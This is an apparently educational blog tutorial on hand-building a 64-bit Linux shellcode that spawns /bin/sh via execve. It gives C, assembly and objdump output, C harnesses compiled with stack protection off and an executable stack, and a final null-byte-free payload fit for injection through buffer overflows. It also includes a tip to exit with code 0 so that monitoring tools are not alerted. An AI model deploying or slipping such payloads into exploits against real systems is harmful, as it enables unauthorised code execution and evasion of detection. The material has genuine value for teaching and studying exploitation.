Making of a shellcode for a 64-bit Linux.
Spoiler: a quick return to the basics of software exploitation, with an article on making a shellcode for a 64-bit architecture.
The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.
For those unfamiliar with the term, a shellcode is a string of bytes containing machine code that can be executed directly by a machine. It depends on the architecture on which it will run, but also on the OS for which it is intended.
My slides then showed, as an example, the creation of a shellcode on Linux for a 32-bit architecture. The code executed was the most classic of shellcodes: opening a command line.
And obviously, I was asked the following question: “What about 64 bits?”
Here is a short article to answer the question. It details the creation of a shellcode that launches /bin/sh on Linux with a 64-bit processor.
C code
If we were really good, we could of course write the shellcode directly in machine code. But few people speak opcode fluently, and even assembly (a slightly more readable translation of the opcodes) is not a very widespread language.
Tradition therefore has it that when we write a shellcode, we start with code in C, which we translate into assembly, then into machine code.
Writing code in C is optional, but has two advantages:
- it lets us define a target: what exactly is our code going to do?
- it gives us an executable that we can disassemble (translate into assembly), for example with gdb, in order to see how it is done.
Target
The following program launches a shell through the use of execve. It will serve as our target: it represents exactly what we want our shellcode to do.
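#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(void) {
    char *name[2];
    name[0] = "/bin/sh";          /* program to run, also used as argv[0] */
    name[1] = NULL;               /* the argument list ends with NULL */
    execve(name[0], name, NULL);  /* replace the current process with /bin/sh */
    exit(0);                      /* only reached if execve failed */
}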
When calling execve(), the system replaces the current process with the one corresponding to the execution of /bin/sh. If this operation succeeds, the instruction flow is interrupted and continues in this new process. If it fails, execution continues with the call to exit(0).
In a main like ours, the call to exit(0) is useless, since if execve failed, the program would terminate naturally anyway.
But the purpose of a shellcode is to be injected into the memory of an attacked process in order to be executed (e.g. by a buffer overflow, but not only). As we have no certainty either about the success of execve() or about the contents of memory after our shellcode, we prefer to force a quiet termination of the process with a call to exit() rather than let it do anything at all.
If we wanted to be cleaner, we would call exit(1), but as we generally do not want to attract the attention of monitoring tools with an error return code (a 1), we lie and say that everything is fine (with a 0).
Compilation
We compile with gcc, then we run the binary and observe that we have indeed opened a shell.
arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode
$
If you want to observe the disassembled code with gdb, I advise you to compile with the following options:
- -static compiles in static mode, so as not to depend on external libraries; at the same time, it lets us disassemble the code of execve, since it will be integrated into our binary,
- -ggdb gives more information in gdb, such as the names of functions,
- -fno-stack-protector removes the protection against buffer overflow set by default at compile time by gcc. On the one hand, we don’t care whether our shellcode is protected against buffer overflow; on the other hand, the protection adds to the assembly code we are going to obtain, and we want to get to the essentials.
Moving to assembly
Now that we know where we are going, we will write the assembly code corresponding to the C code.
We come up against two constraints:
- knowing the address of /bin/sh,
- getting rid of external libraries.
The /bin/sh string
It is not possible to know in advance the address of the string /bin/sh. We will therefore have to be cunning to recover it.
Interestingly, since we are on a 64-bit architecture, it is possible to store the string /bin/sh directly, in its hexadecimal form, in a register: with its terminator, it fits exactly in 8 bytes. /bin/sh in hexadecimal gives 2f 62 69 6e 2f 73 68. As we are on a little-endian architecture, the first character must end up in the least significant byte, which gives 0x68732f6e69622f. Finally, since this is a character string, we add the null character (0x00) at the end, so we will store the value 0x0068732f6e69622f in a register.
We can then push this register onto the stack. The address of the string is then the value of the stack pointer (rsp).
Execve
The second constraint is the obligation to free ourselves from any external libraries, because we are not sure that they are present. We will therefore have to go to the source of the calls, in our case execve and exit.
The execve function is quite a special function. It requires asking the operating system to perform process control tasks. As our user process is not allowed to perform these kinds of operations itself, we have to make system calls.
A quick search in the system call table of the Linux kernel tells us that execve corresponds to system call number 59, i.e. 0x3b in hexadecimal.
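By convention, when making a system call on Linux, the parameters are passed via registers in the following order: rdi, rsi, rdx, r10, r8, r9 (the fourth one is r10 rather than rcx as in ordinary function calls, because the syscall instruction overwrites rcx).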
Likewise, by convention, the system call number must be in the rax register. The system call is then made via the assembly instruction syscall. So we need to put the address of /bin/sh in the rdi register, the address of the argument array (the address of /bin/sh followed by a NULL pointer) in the rsi register, and 0 in the rdx register. We also need to have 0x3b in the rax register.
Which translates into assembly as:
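mov $0x3b, %rax                  # system call number 59: execve
mov $0x0, %rdx                   # third argument: envp = NULL
movabs $0x0068732f6e69622f,%r8   # "/bin/sh" and its terminator, little-endian
push %r8                         # the string now lives on the stack
mov %rsp, %rdi                   # first argument: address of "/bin/sh"
push %rdx                        # argv[1] = NULL
push %rdi                        # argv[0] = address of "/bin/sh"
mov %rsp, %rsi                   # second argument: address of argv
syscall
mov $0x3c, %rax                  # system call number 60: exit
mov $0x0, %rdi                   # exit status 0
syscall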
Exit
As before, exit is a system call. It therefore works in the same way as execve: its only parameter goes in the rdi register, and its number (60, i.e. 0x3c) must be in the rax register.
Its assembly code will therefore be:
mov $0x3c, %rax
mov $0x0, %rdi
syscall
If you want to use gdb to disassemble exit and observe its code, you will find that this is tedious: exit calls __run_exit_handlers, which itself does a lot of things before calling _exit, which ends up making the syscall after putting 0x3c in the rax register.
Final code
Now that we have all the information we need, we can put the pieces together and write the code in assembly language. To make things easier, we add the few decorations that give us a standalone asm file:
.section .text
.globl _start
_start:
mov $0x3b, %rax
mov $0x0, %rdx
movabs $0x0068732f6e69622f,%r8
push %r8
mov %rsp, %rdi
push %rdx
push %rdi
mov %rsp, %rsi
syscall
mov $0x3c, %rax
mov $0x0, %rdi
syscall
We convert it to object code with as, then we generate an executable file with ld.
Since we are not using any external library, ld only adds some “decoration”: the header, the entry point, and not much more.
arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$
Opcode
Now that we have our assembly code, we can finally switch to machine code. Each instruction must be translated into machine code, a sequence of 0s and 1s understandable by the processor. You can use the Intel documentation for this.
But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us …
objdump is a command line program for displaying various information about object files. The option we are interested in is -d, which disassembles. Each instruction gets its own line, which begins with its address, then its hexadecimal encoding, and finally its assembly code.
arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
7: 48 c7 c2 00 00 00 00 mov $0x0,%rdx
e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00
18: 41 50 push %r8
1a: 48 89 e7 mov %rsp,%rdi
1d: 52 push %rdx
1e: 57 push %rdi
1f: 48 89 e6 mov %rsp,%rsi
22: 0f 05 syscall
24: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov $0x0,%rdi
32: 0f 05 syscall
We extract the hexadecimal bytes. This is our shellcode.
\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05
We can then test our shellcode. For that, we will use a small C code. By declaring a function pointer and giving it as value the address of the shellcode, we will be able to execute it:
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    unsigned char code[] =
        "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
        "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
        "\x41\x50\x48\x89\xe7\x52\x57\x48"
        "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
        "\x00\x00\x00\x48\xc7\xc7\x00\x00"
        "\x00\x00\x0f\x05";
    /* Treat the byte array as a function, then call it. */
    int (*ret)() = (int(*)())code;
    ret();
}
To compile, you must use the following options:
- -fno-stack-protector to remove the stack protection automatically set by gcc,
- -z execstack in order to mark the program as allowing an executable stack.
arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop
$ exit
You may also need to install the execstack package.
And there you go! Our shellcode works!
Remove 0x00
Our shellcode is still far from ready for real-world use.
The presence of 0x00 bytes in it can cause it to be truncated when it is copied with a function like strcpy.
An alternative must therefore be found for each problematic instruction.
A mov instruction whose encoding contains zero bytes can be replaced by a push followed by a pop.
In our case, mov $0x3b,%rax and mov $0x3c,%rax are problematic and can be replaced by
push $0x3b
pop %rax
and
push $0x3c
pop %rax
An instruction that puts 0x00 in a register can be replaced by an xor of the register with itself.
We therefore replace mov $0x0,%rdx with
xor %rdx,%rdx
and mov $0x0,%rdi with
xor %rdi,%rdi
Finally, our string itself ends with a \0. To avoid this, we will use the string //bin/sh, which we put in the r8 register, then we perform an 8-bit right shift, which drops the first / and puts a 0 at the end of the string.
In our case,
movabs $0x0068732f6e69622f,%r8
will be replaced by
movabs $0x68732f6e69622f2f,%r8
shr $0x8, %r8
Our final assembly code will therefore be:
.section .text
.globl _start
_start:
push $0x3b
pop %rax
xor %rdx,%rdx
movabs $0x68732f6e69622f2f,%r8
shr $0x8, %r8
push %r8
mov %rsp, %rdi
push %rdx
push %rdi
mov %rsp, %rsi
syscall
push $0x3c
pop %rax
xor %rdi,%rdi
syscall
Using objdump, we check that there are no zero bytes left:
arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 6a 3b pushq $0x3b
2: 58 pop %rax
3: 48 31 d2 xor %rdx,%rdx
6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
d: 2f 73 68
10: 49 c1 e8 08 shr $0x8,%r8
14: 41 50 push %r8
16: 48 89 e7 mov %rsp,%rdi
19: 52 push %rdx
1a: 57 push %rdi
1b: 48 89 e6 mov %rsp,%rsi
1e: 0f 05 syscall
20: 6a 3c pushq $0x3c
22: 58 pop %rax
23: 48 31 ff xor %rdi,%rdi
26: 0f 05 syscall
We therefore have a shellcode from which we have removed the zero bytes. We can test it in the same way as before, by inserting it into a C program.
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv) {
    unsigned char code[] =
        "\x6a\x3b\x58\x48\x31\xd2\x49"
        "\xb8\x2f\x2f\x62\x69\x6e\x2f"
        "\x73\x68\x49\xc1\xe8\x08\x41"
        "\x50\x48\x89\xe7\x52\x57\x48"
        "\x89\xe6\x0f\x05\x6a\x3c\x58"
        "\x48\x31\xff\x0f\x05";
    /* Treat the byte array as a function, then call it. */
    int (*ret)() = (int(*)())code;
    ret();
}
By compiling and running:
arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2
$ exit
What next?
You can use this method to create your own shellcodes. It can of course be adapted to 32-bit Linux, or even to Windows, and you can reuse the principle to do more than just launch a shell.